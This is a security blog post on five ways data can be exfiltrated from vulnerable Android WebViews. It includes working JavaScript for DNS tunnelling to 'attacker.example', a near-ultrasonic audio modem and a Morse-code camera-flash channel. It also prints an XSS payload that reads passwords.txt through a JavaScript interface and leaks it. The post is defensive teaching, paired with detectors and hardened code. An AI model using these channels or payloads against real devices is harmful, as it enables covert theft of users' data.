
The Top 5 Exfiltration Attacks on WebViews

WebViews are a huge advantage when it comes to portability. But at what cost? By allowing web content to interact with native functions, a window of attack possibilities opens. Before API level 17 (Android 4.2), any object exposed through addJavascriptInterface() let page JavaScript call every public method of that object, reflection included, which an attacker who controlled the page content could turn into remote code execution. Since API 17 only methods annotated with @JavascriptInterface are exposed, but note that this protection only applies to apps whose targetSdkVersion is 17 or higher. Even with it in place, such attacks can still be devastating: it depends entirely on what the exposed methods do. We did some research and determined that these are the top five exfiltration attacks on WebViews.

Gaining illicit access to mobile devices via bad WebView implementations is out of the scope of this blog post. Our goal is to raise awareness of the consequences of these exploitations in terms of information leakage, since several exfiltration techniques can be used to bypass security controls.

Exfiltration, also known as data extrusion, is the unauthorized transfer of data out of a system, usually over a covert channel, and is typically carried out for espionage or ransom.

In this blog post, we’ll describe the top five exfiltration attack scenarios for vulnerable WebView implementations, highlighting attack techniques and defense strategies.

1. Mobile Carrier Network

The majority of mobile devices are connected to a mobile carrier network. Only in very particular situations is there no need to make and receive calls.

On these public networks it is very difficult to detect data leakage. For instance, if an attacker gains access to critical files in the device's storage, they can send the contents by SMS, email or even a phone call. Audio exfiltration requires encoding the data into sound; the particulars of these attacks are covered later on.

To detect and prevent the exfiltration, software can monitor access to critical files and stop the processes that try to read them. Another good approach is to encrypt important files, email, notes, etc., and to require specific software on the mobile device to open sensitive data.

But even when the device has these security measures, or holds no sensitive information at all, information disclosure is still possible. If malware has access to an input device such as the camera or microphone, sensitive information can be recorded in real time and exfiltrated afterwards. If the audio of an important meeting is captured illicitly, for instance, detecting the attack is harder, since no important files are read and writing to disk can be avoided as well.

Another way to gather sensitive data without reading the local disk is to use the cloud services configured on the device. If the phone has client software configured to access cloud services, such as a remote disk drive, malware may abuse that client and sensitive data may be stolen. Because of all these vectors for reaching data, strict policies can be justified, such as forbidding mobile devices in meetings, mandating encryption of all data and denying access to cloud services.

2. WiFi Network

With internet access through a local WiFi network, exfiltration has many more possible vectors. On the other hand, local WiFi traffic can be monitored by detection systems such as IDS/IPS and DLP.

When these mechanisms are in place, exfiltration over unencrypted transfer protocols like FTP is detected and blocked immediately. Using SSL/TLS, as recent messaging and social network clients do, will succeed in most domestic environments. Corporate environments, in contrast, usually implement SSL/TLS inspection, which gives the DLP a view of the plaintext and can stop the exfiltration.

To bypass detection mechanisms, encoding and encryption come into play. Malware often encodes or encrypts the information it exfiltrates so that inspection only sees opaque data, and even when the attack is identified after the fact, the forensic analysis is harder.

To fight these attacks, firewalls are used together with IDS/IPS, DLP and SSL/TLS inspection. Only a small number of ports are open to the internet (HTTP and HTTPS, for example), and the IDS/IPS verifies that the traffic on each port is actually the protocol expected there. To bypass a corporate setup like this, an attacker can try to place a receiving service in the same LAN as the sender, thus avoiding the network security controls at the perimeter. Of course, this requires access to the facilities and physical network security weaknesses. To overcome all of these obstacles and controls, several creative techniques are used, for instance riding on normal, apparently legitimate HTTP/HTTPS and DNS traffic.

One HTTP/HTTPS-based technique converts the data to binary and makes ordinary HTTP/HTTPS requests to a legitimate site that is rarely visited. The key is the web server's cache and the response headers that reveal whether a page was served from it. A request for the page represents a "1" and no request represents a "0". The receiver must be coordinated with the sender and visit the same site right after the sender's time slot, reading the caching headers of the response to learn whether the page was just visited by the sender (a "1") or not (a "0"). This technique is very slow, although using several URLs in parallel improves throughput.

As an alternative, a DNS approach to exfiltration is much more effective. One technique seen in the wild uses an attacker-controlled DNS server (the receiver) that is authoritative for an attacker domain. The sender encodes the data to be exfiltrated and issues DNS queries for names under the attacker domain, with the encoded data as the subdomain prefix. Each query is forwarded by the local DNS resolver to the attacker's server, which logs all requests and thereby stores the leaked data; no direct connection from the victim to the attacker is needed. This DNS traffic is unlikely to be identified as malicious by the security devices. An interesting measure against these scenarios is whitelisting internet access, i.e. only allowing access to a list of well-known web sites, but the whitelist must also cover name resolution: if the internal resolver still forwards queries for arbitrary domains, the DNS channel stays open. Monitoring resolver logs for unusually long or high-entropy query names is the complementary detective control.
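Both halves of the DNS channel, and the resolver-log check that catches it, as an added example (this is not code from the original post or from the malware it refers to). The attacker domain "attacker.example", the base32 label encoding, the sequence-number layout and the log line format are assumptions made for the illustration; the sample log lines are constructed and carry the post's own sample secret.

```javascript
'use strict';

const BASE32 = 'abcdefghijklmnopqrstuvwxyz234567'; // DNS names are case-insensitive, so base32 survives the trip

// RFC 4648 base32, lowercase, without '=' padding (padding is not a valid label character).
function base32Encode(bytes) {
  let bits = 0, value = 0, out = '';
  for (const b of bytes) {
    value = (value << 8) | b;
    bits += 8;
    while (bits >= 5) {
      bits -= 5;
      out += BASE32[(value >>> bits) & 31];
    }
    value &= (1 << bits) - 1; // keep only the bits not yet emitted
  }
  if (bits > 0) out += BASE32[(value << (5 - bits)) & 31];
  return out;
}

function base32Decode(str) {
  let bits = 0, value = 0;
  const out = [];
  for (const c of str) {
    value = (value << 5) | BASE32.indexOf(c);
    bits += 5;
    if (bits >= 8) {
      bits -= 8;
      out.push((value >>> bits) & 0xff);
      value &= (1 << bits) - 1;
    }
  }
  return Buffer.from(out);
}

// Sender: one query per label of at most 63 characters (the DNS label limit),
// prefixed with a sequence number so the receiver can put the chunks back in order.
function buildExfilQueries(data, domain, maxLabel = 63) {
  const encoded = base32Encode(Buffer.from(data, 'utf8'));
  const names = [];
  for (let i = 0, seq = 0; i < encoded.length; i += maxLabel, seq++) {
    names.push(`${seq}.${encoded.slice(i, i + maxLabel)}.${domain}`);
  }
  return names;
}

// Receiver: the authoritative server for `domain` only has to log the names it
// is asked for; the payload is recovered by sorting and joining the chunks.
function recoverFromQueries(names, domain) {
  const suffix = '.' + domain;
  const chunks = names
    .filter((n) => n.endsWith(suffix))
    .map((n) => n.slice(0, -suffix.length).split('.'))
    .sort((a, b) => Number(a[0]) - Number(b[0]))
    .map((parts) => parts[1]);
  return base32Decode(chunks.join('')).toString('utf8');
}

// Defender: Shannon entropy of a string in bits per character.
function entropy(s) {
  const counts = new Map();
  for (const c of s) counts.set(c, (counts.get(c) || 0) + 1);
  let h = 0;
  for (const n of counts.values()) {
    const p = n / s.length;
    h -= p * Math.log2(p);
  }
  return h;
}

// The labels left after stripping the registered domain (assumed to be the last
// two labels here; a public-suffix list does this properly) are judged on length
// and entropy: encoded payloads are long and look random, ordinary hostnames are
// short and repetitive. The thresholds are starting points to tune against a
// baseline of the environment's own traffic.
function isSuspiciousName(name, { minLen = 20, minEntropy = 3.5, registeredLabels = 2 } = {}) {
  const labels = name.replace(/\.$/, '').split('.');
  const prefix = labels.slice(0, -registeredLabels).join('');
  return prefix.length >= minLen && entropy(prefix) >= minEntropy;
}

// Constructed resolver log lines: "<timestamp> <client> <qtype> <qname>".
// The third line carries the post's sample secret ("checkmarx" and "cx1234").
const SAMPLE_LOG = [
  '2018-01-22T10:00:01Z 10.0.0.5 A www.example.com',
  '2018-01-22T10:00:02Z 10.0.0.5 AAAA mail.example.net',
  '2018-01-22T10:00:03Z 10.0.0.5 A ' + buildExfilQueries('checkmarx\ncx1234', 'attacker.example')[0],
  '2018-01-22T10:00:04Z 10.0.0.7 A updates.example.org',
];

// Returns the client and query name of every flagged line.
function scanLog(lines) {
  return lines
    .map((l) => l.trim().split(/\s+/))
    .filter((f) => f.length === 4 && isSuspiciousName(f[3]))
    .map((f) => ({ client: f[1], qname: f[3] }));
}

console.log(scanLog(SAMPLE_LOG));
```

A real client would add a nonce label to defeat resolver caching and spread the queries over time; a real detector would complement the per-name heuristic with a count of distinct subdomains per (client, domain) pair, which catches short chunks that stay below the length threshold.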

3. Bluetooth and NFC

Earlier in this post, we referred to mobile devices that were connected to a mobile carrier network or a domestic/corporate WiFi network. From this part of the post onward, only air-gap situations are considered. An air gap is the isolation of systems or networks from unsecured networks such as the internet. In these scenarios, exfiltrating sensitive data over the network without being detected is very difficult: it requires physical access to the systems or the isolated network to implant a receiver.

So, once again, creativity comes into play. There are several ways of exfiltrating data without using common TCP/IP communication, such as NFC and Bluetooth.

NFC stands for near-field communication and is a wireless communication technology that, in typical implementations, only works between devices that are less than about 10 cm apart. It is well known for its use in contactless payment systems. Using NFC to exfiltrate data can be effective if the attacker manages to get very close to the device: for instance, if the receiving device is a mobile phone and the attacker manages to stand near the victim at the office or in a public place, they can hold their device next to the victim's phone without looking suspicious. On the other hand, proximity increases the attacker's risk of being caught. To increase the physical distance the attack allows, Bluetooth can be used.

Bluetooth is another well-known wireless technology for communication between devices over short distances. Depending on the device class, it can transmit over an open-air distance of up to around 100 m, and it provides higher transmission rates than NFC. The advantages of NFC over Bluetooth are lower energy consumption and no need for pairing. A good way to prevent exfiltration with these technologies is to avoid mobile devices that have Bluetooth and NFC functionality, or to physically disable these radios.

4. Audio Frequencies

Audio frequencies are another way of exfiltrating data. By converting the data to binary or another code, the device's speaker can play different tones (frequencies) representing different symbols. To avoid detection, however, near-ultrasonic frequencies are a more effective approach.

In theory a human being can hear frequencies between 20 Hz and 20 kHz, but most adults only hear frequencies below about 17 kHz. Near-ultrasonic frequencies are those between 17 kHz and 20 kHz. Encoded data sent at these frequencies will go unnoticed by the majority of adults, yet a microphone and sound card will capture it without trouble, as long as the receiver samples at least twice the highest tone frequency (a standard 44.1 kHz or 48 kHz sample rate covers the whole band). For the exfiltration to work, the attacker has to plant a microphone near the victim's mobile device so that it can capture the sound. Afterwards, the captured sound needs to be decoded with the proper software.

Besides regular data encoding, spectrograms are also an option. This is a steganography technique that can be used to exfiltrate images. A spectrogram is a visual representation of sound frequencies over time, so it is easier and faster to exfiltrate a big image as a spectrogram than, for example, as binary code. Leaked images can be viewed with regular audio software that has spectrogram visualization. Spectrogram exfiltration can use near-ultrasonic frequencies as well. Some people can hear near-ultrasonic frequencies, especially children, so it is also possible to mix the near-ultrasonic spectrogram with the frequencies of a real song. With this approach, the victim listens to the music and doesn't realize that an exfiltration attack is taking place.

Instead of the mobile device's speaker, the vibration motor can also be used for exfiltration through audio frequencies. As the device vibrates, it produces sound that can be identified and decoded by a receiver. These techniques are very effective for small amounts of data but require the attacker to be near the victim during the attack.
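The near-ultrasonic tone scheme described at the start of this section, as an added example that is not code from the original post: a minimal binary FSK modem in which the sender turns bytes into PCM samples (one tone per bit) and the receiver measures the energy at each tone frequency per symbol window with the Goertzel algorithm, which is cheaper than an FFT when only two bins matter. The sample rate, tone frequencies and symbol length are assumptions chosen so that each tone lands exactly on a DFT bin; the noise added before decoding is constructed to stand in for a microphone across the room.

```javascript
'use strict';

const SAMPLE_RATE = 48000;  // must be at least 2x the highest tone (Nyquist); 44.1 kHz would also do
const F_ZERO = 18000;       // tone for bit 0, in the 17-20 kHz near-ultrasonic band
const F_ONE = 19000;        // tone for bit 1
const SYMBOL_SAMPLES = 480; // 10 ms per bit = 100 bit/s; 480 samples make both tones integer DFT bins

function bytesToBits(bytes) {
  const bits = [];
  for (const b of bytes) for (let i = 7; i >= 0; i--) bits.push((b >> i) & 1);
  return bits;
}

function bitsToBytes(bits) {
  const out = [];
  for (let i = 0; i + 8 <= bits.length; i += 8) {
    let b = 0;
    for (let j = 0; j < 8; j++) b = (b << 1) | bits[i + j];
    out.push(b);
  }
  return Buffer.from(out);
}

// Sender: one sine burst per bit at half full scale.
function modulate(text) {
  const bits = bytesToBits(Buffer.from(text, 'utf8'));
  const samples = new Float32Array(bits.length * SYMBOL_SAMPLES);
  bits.forEach((bit, k) => {
    const f = bit ? F_ONE : F_ZERO;
    for (let n = 0; n < SYMBOL_SAMPLES; n++) {
      samples[k * SYMBOL_SAMPLES + n] = 0.5 * Math.sin((2 * Math.PI * f * n) / SAMPLE_RATE);
    }
  });
  return samples;
}

// Goertzel: squared magnitude of one DFT bin over a block of `len` samples.
function goertzelPower(samples, start, len, freq) {
  const k = Math.round((len * freq) / SAMPLE_RATE);
  const coeff = 2 * Math.cos((2 * Math.PI * k) / len);
  let s1 = 0, s2 = 0;
  for (let n = 0; n < len; n++) {
    const s0 = samples[start + n] + coeff * s1 - s2;
    s2 = s1;
    s1 = s0;
  }
  return s1 * s1 + s2 * s2 - coeff * s1 * s2;
}

// Receiver: compare the energy at the two tones in every symbol window.
function demodulate(samples) {
  const bits = [];
  for (let start = 0; start + SYMBOL_SAMPLES <= samples.length; start += SYMBOL_SAMPLES) {
    const p0 = goertzelPower(samples, start, SYMBOL_SAMPLES, F_ZERO);
    const p1 = goertzelPower(samples, start, SYMBOL_SAMPLES, F_ONE);
    bits.push(p1 > p0 ? 1 : 0);
  }
  return bitsToBytes(bits).toString('utf8');
}

// Reproducible white noise (small LCG) to mimic the microphone's pickup.
function addNoise(samples, amplitude, seed = 1) {
  let x = seed;
  const out = new Float32Array(samples.length);
  for (let i = 0; i < samples.length; i++) {
    x = (Math.imul(x, 1103515245) + 12345) & 0x7fffffff;
    out[i] = samples[i] + amplitude * ((x / 0x7fffffff) * 2 - 1);
  }
  return out;
}

const received = demodulate(addNoise(modulate('cx1234'), 0.5));
console.log(received, '|', (modulate('cx1234').length / SAMPLE_RATE).toFixed(2), 'seconds of audio');
```

At 100 bit/s the post's two-line password file takes under two seconds of inaudible audio. Real deployments add a preamble so the receiver can find the first symbol boundary, and keep the tones below the Nyquist limit of whatever the receiving microphone actually samples at, which is the check to make before trusting the near-ultrasonic band.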

5. Light

Several components of mobile devices can emit light. A camera flash, the screen itself, an IR blaster (infrared) or a notification LED, to name a few, are all capable of producing light and can be used for data exfiltration.

Apart from being an effective way to exfiltrate across air gaps, light allows data transmission over long distances. With a camera that can focus from far away, the light can be interpreted and decoded from hundreds of meters, depending on the light intensity, the camera and the obstacles between them. There are also solutions for short distances that can be used inside an office, such as light sensors or cameras hidden in clothes, furniture, office supplies, etc.

A simple approach for converting and transmitting the data is binary encoding: the light is turned on for a "1" and stays off for a "0". Another common encoding is Morse code. Although it only covers letters, digits and a little punctuation, the encoded text is shorter than plain binary. Non-binary codes can be used if the attacker can produce several distinguishable signals with the same light source, for example different brightness levels or colors on the screen, or different pulse lengths from the flash; each symbol then carries more than one bit, which shortens the transmission. With a light sensor on the receiver, the different signals are recognized and passed to decoding software.

The transmission rate depends on the duration defined for each signal. For human reading, only slow rates are usable. On the other hand, a light sensor or camera can identify the signals when the light blinks faster than humans can perceive, which increases the transmission rate and lowers the probability that the exfiltration is noticed.

A vulnerable application called WebViewGoat was created to demonstrate exfiltration scenarios. It is publicly available so that people can simulate attacks and use it for learning and awareness. The application is written as if by a developer who split the development into two stages and released the first version early, to start earning money sooner.

WebViewGoat was designed to read a QRCode with the help of the mobile device camera. If the QRCode has a web link, it will open a web page inside a WebView without leaving the app, and this page uses an iframe to load and show the site of the QRCode link. The app works well and there are no signs of vulnerabilities for the common user. The following images are screenshots of the app reading a QRCode with the link

Screenshots: "WebViewGoat - Your QR Code Brought You Here" and "WebViewGoat - Read QR Code".


In fact, there are several vulnerabilities. There is a reflected XSS vulnerability in the web page that is loaded by the WebView. There is also a JavaScript Interface available in the WebView that allows interaction with the camera flash and the memory card. The functions that control the camera flash were written, but the developer wasn't able to use them as intended: the flash was supposed to turn on during the QR code reading and turn off once the web page was loaded in the WebView. Having problems implementing this, the developer left the solution for the second development stage. Reading QR codes from files was postponed as well, but the functions that read and write files on the memory card were left in the code for future use.

In conclusion, the functions for camera flash control and file reading stayed in the code and, even though they are not used, they are available to any page loaded in the WebView, and are more than enough for an exfiltration attack using light as the transmission medium. This is the practical lesson: an exposed JavaScript Interface is reachable by whatever content ends up in the WebView, so dead or future-use methods must not be exposed through it. The following images show the JavaScript code vulnerable to XSS, and some functions that are available in the WebView through the JavaScript Interface "Android".

Screenshots: "JavaScript vulnerable to exploit" and "Functions to control the flash".

To demonstrate a successful attack, a JavaScript file named codes.js was created and placed on a malicious server reachable from the Internet. This file contains functions that encode data as Morse code and send the encoded data by blinking the camera flash. Using the XSS vulnerability, this JavaScript file is included in the page. A file named passwords.txt is then read from the memory card and its content is exfiltrated. The following payload, with the script source URL left blank, does all of this:

'></iframe><script src=''></script><script>var aux=Android.readFile("passwords.txt");var lines=aux.split("\n");for (j=0;j<lines.length;j++){ sendMessage(lines[j]); Android.flashOff(2000); } </script>

The leading '> closes the iframe's src attribute and the tag itself, the first script tag loads codes.js, and the second one reads the file through the JavaScript Interface, sends each line with sendMessage() (defined in codes.js) and calls Android.flashOff(2000) between lines as a two-second dark gap that lets the receiver tell the lines apart.
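The shape of the bug the payload above relies on, reconstructed as an added example (WebViewGoat's own page source is only shown as an image in the post, so this is not its code): the URL read from the QR code is concatenated into an iframe tag, so a single quote ends the attribute and the rest of the "URL" becomes markup. The function names and the constructed payload string are assumptions; the hardened version parses the value as a URL, accepts only http(s) and HTML-encodes it before it is placed in an attribute.

```javascript
'use strict';

// Vulnerable: string concatenation, no encoding, no scheme check.
function buildViewerHtmlVulnerable(link) {
  return "<iframe src='" + link + "'></iframe>";
}

// Encode the five characters that can terminate or alter an HTML attribute.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: returns null for anything that is not an absolute http(s) URL.
function buildViewerHtmlSafe(link) {
  let url;
  try {
    url = new URL(link); // throws on relative or garbage input such as "'></iframe>..."
  } catch (e) {
    return null;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return null; // blocks javascript:, file:, content:, ...
  return "<iframe src='" + escapeHtmlAttr(url.href) + "'></iframe>";
}

// Constructed payload of the same shape as the one in the post (a harmless alert instead of codes.js).
const PAYLOAD = "'></iframe><script>alert(document.domain)</script>";

// Count how many tags a builder's output really contains: a clean viewer has exactly two (<iframe>, </iframe>).
function tagCount(html) {
  return (html.match(/</g) || []).length;
}

console.log('vulnerable:', buildViewerHtmlVulnerable(PAYLOAD));
console.log('safe:', buildViewerHtmlSafe(PAYLOAD));
console.log('safe, scheme smuggled:', buildViewerHtmlSafe('https://example.com/' + PAYLOAD));
```

In the page itself the safe version should not build markup at all but create the iframe with document.createElement() and assign url.href to its src property, which cannot break out of an attribute. The scheme check matters independently of the escaping: a javascript: URL is a perfectly well-formed attribute value and would still run inside the WebView.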

The content of the passwords.txt file is "checkmarx" and "cx1234". In the following video, the attack is demonstrated with slow light blinks, so a human can read the leaked data without a light sensor or decoding software.
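What codes.js has to do, and what the receiving side does with the blinks, as an added example serving both the light-encoding discussion in section 5 and the demo above (the real codes.js is not shown in the post, so this is not its code). Text goes to Morse and then to an on/off schedule for the flash; a sampled light-sensor trace goes back through run lengths and Morse to text. The `flash` object with on(ms)/off(ms) is a stand-in for the app's JavaScript Interface, the recorder replaces a real sensor so the block runs anywhere, and the timing unit is an assumption.

```javascript
'use strict';

const MORSE = {
  a: '.-', b: '-...', c: '-.-.', d: '-..', e: '.', f: '..-.', g: '--.', h: '....', i: '..', j: '.---',
  k: '-.-', l: '.-..', m: '--', n: '-.', o: '---', p: '.--.', q: '--.-', r: '.-.', s: '...', t: '-',
  u: '..-', v: '...-', w: '.--', x: '-..-', y: '-.--', z: '--..',
  0: '-----', 1: '.----', 2: '..---', 3: '...--', 4: '....-', 5: '.....', 6: '-....', 7: '--...', 8: '---..', 9: '----.',
};
const FROM_MORSE = Object.fromEntries(Object.entries(MORSE).map(([ch, code]) => [code, ch]));
const UNIT_MS = 200; // dot length; standard timing: dash 3 units, gap inside a letter 1, between letters 3, between words 7

// Text -> ordered list of {on, ms} intervals. Characters without a Morse code are skipped.
function toSchedule(text) {
  const schedule = [];
  text.toLowerCase().trim().split(/\s+/).forEach((word, wi) => {
    if (wi > 0) schedule.push({ on: false, ms: 7 * UNIT_MS });
    let firstLetter = true;
    for (const ch of word) {
      const code = MORSE[ch];
      if (!code) continue;
      if (!firstLetter) schedule.push({ on: false, ms: 3 * UNIT_MS });
      firstLetter = false;
      [...code].forEach((sym, si) => {
        if (si > 0) schedule.push({ on: false, ms: UNIT_MS });
        schedule.push({ on: true, ms: (sym === '-' ? 3 : 1) * UNIT_MS });
      });
    }
  });
  return schedule;
}

// Sender: drive anything that exposes on(ms) and off(ms), e.g. a wrapper around
// the app's flash methods (assumed interface, not WebViewGoat's exact API).
function transmit(text, flash) {
  for (const step of toSchedule(text)) step.on ? flash.on(step.ms) : flash.off(step.ms);
}

// Stand-in for flash + light sensor: records one reading (1 = bright, 0 = dark) every sampleMs.
function makeRecorder(sampleMs = 50) {
  const samples = [];
  return {
    sampleMs,
    samples,
    on(ms) { for (let t = 0; t < ms; t += sampleMs) samples.push(1); },
    off(ms) { for (let t = 0; t < ms; t += sampleMs) samples.push(0); },
  };
}

// Receiver: collapse the trace into runs, classify each run by its length in
// units (thresholds sit halfway between the nominal 1/3 and 3/7 unit values),
// and map the resulting Morse back to text. Unknown letters become '?'.
function decodeTrace(samples, sampleMs, unitMs = UNIT_MS) {
  const runs = [];
  for (const s of samples) {
    if (runs.length && runs[runs.length - 1].level === s) runs[runs.length - 1].n++;
    else runs.push({ level: s, n: 1 });
  }
  let text = '', letter = '';
  const flushLetter = () => { if (letter) { text += FROM_MORSE[letter] || '?'; letter = ''; } };
  for (const r of runs) {
    const units = (r.n * sampleMs) / unitMs;
    if (r.level === 1) letter += units >= 2 ? '-' : '.';
    else if (units >= 5) { flushLetter(); text += ' '; }
    else if (units >= 2) flushLetter();
  }
  flushLetter();
  return text;
}

const rec = makeRecorder();
transmit('checkmarx', rec);
console.log(decodeTrace(rec.samples, rec.sampleMs), '|', rec.samples.length * rec.sampleMs, 'ms of blinking');
```

The decoder only needs the sampling interval to be a few times shorter than the dot; shortening UNIT_MS speeds up the channel until the camera or sensor on the receiving end can no longer resolve a dot, which is the knob the post refers to when it contrasts human-readable speed with sensor speed.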


This is part three of a four-part series. Read part 1: Android WebView: Secure Coding Practices, part 2: JavaScript Attacks in WebViews, and part 4: Android WebView: Are Secure Coding Practices Being Followed?



References

Preventing Data Exfiltration, 2017
Perfect Data Exfiltration Demonstrated, 2016
20 Years of DNS Data Exfiltration: Why, How, and What's Next?, 2017
BruCON 0x09 – Hacking invisibly and silently with light and sound – Matt Wixey, 2017
Air gap (Wikipedia), 2017
Near-field communication (Wikipedia), 2017

(This post was originally published on January 22, 2018.)
